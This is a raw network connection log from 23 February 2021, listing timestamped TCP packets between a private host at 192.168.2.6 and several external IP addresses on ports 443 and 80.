Feb 23, 2021 17:49:48.918209076 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.919090033 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.007814884 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.007843971 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.007860899 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.007905960 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.010415077 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.095577002 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.097162962 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.219329119 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.270108938 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.271473885 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.356026888 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.444279909 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:49.485711098 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:49.582520962 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:52.595526934 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:53.363697052 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:53.363720894 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:53.363797903 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:53.364094019 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:53.714137077 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:53.714181900 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:53.714334011 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:54.445746899 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:54.445766926 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:54.445851088 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:54.446018934 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:54.446115017 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:54.530400038 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:54.530421019 CET	443	49736	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:58.627125978 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:58.711805105 CET	443	49737	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:58.711931944 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:58.712088108 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:58.795855999 CET	443	49737	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:58.795979023 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:58.796015978 CET	49737	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:58.879374027 CET	443	49737	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:59.023075104 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.105623960 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.106158018 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.106914997 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.192554951 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.192575932 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.192593098 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.192733049 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.192749977 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.199165106 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.282092094 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.282172918 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.283010006 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.405838966 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.470501900 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.471523046 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.476355076 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.559042931 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.559978008 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.560750008 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.643721104 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.647974968 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.648602962 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.653100014 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.735832930 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.851914883 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:49:59.852087021 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:49:59.996455908 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.081012964 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.083642006 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.085335970 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.172286034 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.172316074 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.172326088 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.173136950 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.174613953 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.259367943 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.261727095 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.389991045 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.461338043 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.464049101 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.548610926 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.651942968 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:00.707186937 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:00.881963968 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:03.893305063 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:04.471513033 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:04.471537113 CET	443	49740	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:04.471792936 CET	49740	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:04.853307009 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:04.853336096 CET	443	49741	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:04.853364944 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:04.853399038 CET	49741	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:05.653006077 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:05.653023958 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:05.653094053 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:05.653529882 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:05.653584003 CET	49742	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:05.737869024 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:05.737895966 CET	443	49742	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:09.893680096 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:09.976397038 CET	443	49743	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:09.976496935 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:09.976687908 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:10.059248924 CET	443	49743	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:10.059698105 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:10.059711933 CET	49743	443	192.168.2.6	190.115.26.106
Feb 23, 2021 17:50:10.144579887 CET	443	49743	190.115.26.106	192.168.2.6
Feb 23, 2021 17:50:10.191138029 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.235024929 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.236707926 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.237399101 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.284121990 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.284197092 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.284204006 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.284246922 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.284276962 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.284301043 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.309359074 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.353535891 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.358052015 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.358891964 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.438250065 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.438410044 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.440413952 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.484440088 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.484678030 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.485202074 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.529618025 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.529788017 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.530453920 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.542920113 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.588376999 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.637897968 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.642106056 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.756371021 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.802885056 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.803006887 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.803755045 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.852948904 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.852983952 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.853003979 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.853049994 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.855381012 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.900203943 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.901453972 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:10.985733032 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.996563911 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:10.999715090 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.045007944 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:11.076236010 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:11.139254093 CET	49752	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.186948061 CET	443	49752	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:11.187052011 CET	49752	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.187283039 CET	49752	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.206353903 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.231256008 CET	443	49752	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:11.231539965 CET	49752	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.231564045 CET	49752	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:11.275484085 CET	443	49752	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:11.374186039 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.435347080 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.435451031 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.436157942 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.498995066 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.499058962 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.499095917 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.499169111 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.499218941 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.504462004 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.568252087 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.568825960 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.569860935 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.672374964 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.724287033 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:11.724364042 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:11.727536917 CET	49756	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:14.754761934 CET	49756	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:15.440201998 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:15.440237999 CET	443	49748	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:15.440294027 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:15.440337896 CET	49748	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:15.638876915 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:15.638904095 CET	443	49749	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:15.638945103 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:15.639120102 CET	49749	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:16.076735973 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:16.076761007 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:16.076916933 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:16.725348949 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:16.725375891 CET	443	49754	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:16.725501060 CET	49754	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:17.341027975 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:17.341120958 CET	49751	443	192.168.2.6	62.75.198.178
Feb 23, 2021 17:50:17.385056019 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:17.385107040 CET	443	49751	62.75.198.178	192.168.2.6
Feb 23, 2021 17:50:20.863362074 CET	49756	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:32.867258072 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:32.952349901 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:32.952459097 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:32.953275919 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.043066025 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.043097973 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.043261051 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.044198036 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.044305086 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.050806999 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.135768890 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.136159897 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.137428045 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:33.260230064 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.313307047 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:33.313558102 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:34.473134041 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.533593893 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.533767939 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.534918070 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.597896099 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.597944975 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.597976923 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.601062059 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.601114035 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.662017107 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.663523912 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.763602972 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.802843094 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.803806067 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:34.864325047 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.939424038 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:34.989608049 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.003622055 CET	49770	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.064203978 CET	443	49770	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:35.064481020 CET	49770	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.064672947 CET	49770	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.125170946 CET	443	49770	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:35.125423908 CET	49770	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.125493050 CET	49770	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:35.185911894 CET	443	49770	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:35.328531981 CET	49771	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:38.314280033 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:38.314307928 CET	443	49768	194.54.82.13	192.168.2.6
Feb 23, 2021 17:50:38.314506054 CET	49768	443	192.168.2.6	194.54.82.13
Feb 23, 2021 17:50:38.333627939 CET	49771	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:39.940778017 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:39.940804958 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:39.941204071 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:39.941256046 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:39.941375017 CET	49769	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:40.001584053 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:40.004771948 CET	443	49769	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:44.349773884 CET	49771	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:56.352611065 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.412806988 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.412926912 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.414217949 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.477116108 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.477147102 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.477161884 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.477283001 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.482996941 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.543800116 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.544039011 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.544991970 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.643521070 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.675949097 CET	443	49777	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.676196098 CET	49777	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.679862022 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.740221977 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.740355015 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.741008997 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.801476002 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.802100897 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.802573919 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.806298971 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:56.866755962 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.940846920 CET	443	49778	88.80.20.20	192.168.2.6
Feb 23, 2021 17:50:56.941138983 CET	49778	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:50:57.037015915 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.125466108 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.125696898 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.126332045 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.219105959 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.219130993 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.219146013 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.219283104 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.221869946 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.311774969 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.312881947 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.439302921 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.493118048 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.495955944 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.584399939 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.676260948 CET	443	49779	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.725935936 CET	49779	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.783222914 CET	49780	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.871787071 CET	443	49780	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.871952057 CET	49780	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.872148037 CET	49780	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.960885048 CET	443	49780	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:57.960994005 CET	49780	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:57.961035013 CET	49780	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:50:58.049532890 CET	443	49780	194.54.82.12	192.168.2.6
Feb 23, 2021 17:50:58.063150883 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.134201050 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.134356022 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.135217905 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.206221104 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.208949089 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.208997011 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.209019899 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.209038019 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.209053993 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.209059000 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.209089994 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.209150076 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.225780010 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.297247887 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.297322035 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.298197031 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.408242941 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.512631893 CET	443	49781	144.76.12.6	192.168.2.6
Feb 23, 2021 17:50:58.512706995 CET	49781	443	192.168.2.6	144.76.12.6
Feb 23, 2021 17:50:58.515810966 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.559659004 CET	80	49782	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.559765100 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.560293913 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.604026079 CET	80	49782	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.604058981 CET	80	49782	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.605179071 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.649339914 CET	80	49782	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.658762932 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.694628954 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.702697992 CET	80	49783	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.702795029 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.703516006 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.747313976 CET	80	49783	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.747348070 CET	80	49783	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.747442961 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.749028921 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:50:58.792897940 CET	80	49783	47.91.94.99	192.168.2.6
Feb 23, 2021 17:50:58.793044090 CET	49783	80	192.168.2.6	47.91.94.99
